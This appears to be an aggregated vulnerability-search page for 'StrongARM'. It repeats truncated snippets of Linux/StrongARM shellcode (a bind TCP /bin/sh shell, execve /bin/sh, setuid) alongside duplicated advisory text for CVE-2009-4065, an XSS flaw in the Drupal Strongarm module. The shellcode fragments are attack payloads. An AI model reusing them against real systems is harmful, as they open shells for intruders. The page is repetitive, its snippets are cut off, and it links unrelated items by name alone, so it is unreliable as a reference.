EUVD-2009-4036

Malware in sbrugna...

Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)

/ 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 / "\x01\x30\x87\xe2" / add r3, r7, 1 / "\x13\x07\xa0\xe1" / mov r0, r3, lsl r7 / "\x01\x20\x83\xe2" / add r...

Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)

/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...

Linux/StrongARM - setuid() Shellcode (20 bytes)

/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...

CVE-2009-4065

Cross-site scripting XSS vulnerability in the settings page in the Strongarm module 6.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the value field when viewing overridden variables...

Cross site scripting

Cross-site scripting XSS vulnerability in the settings page in the Strongarm module 6.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the value field when viewing overridden variables...

CVE-2009-4065

Cross-site scripting XSS vulnerability in the settings page in the Strongarm module 6.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the value field when viewing overridden variables...

CVE-2009-4065

The CVE-2009-4065 entry describes an XSS vulnerability in the Drupal Strongarm module (6.x) settings page, exploitable via the value field when viewing overridden variables. Affected product/component: Drupal module Strongarm 6.x prior to 6.x-1.1. Root cause: improper sanitization in the settings...

SA-CONTRIB-2009-103 - Strongarm - Cross Site Scripting

The Strongarm module enables other modules to enforce variable settings programmatically. It can also be used to override any of these variables, and lets the administrator see which variables have been overridden, along with their current values. When using the settings page to see overridden...

Linux/StrongARM - setuid() Shellcode (20 bytes)

Linux/StrongARM - setuid Shellcode 20 bytes. Shellcode exploit for ARM platform / 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r...

Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)

Linux/StrongARM - execve/bin/sh Shellcode 47 bytes. Shellcode exploit for ARM platform / 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / st...

Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)

Linux/StrongARM - Bind TCP Shell /bin/sh Shellcode 203 bytes. Shellcode exploit for ARM platform / 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 /...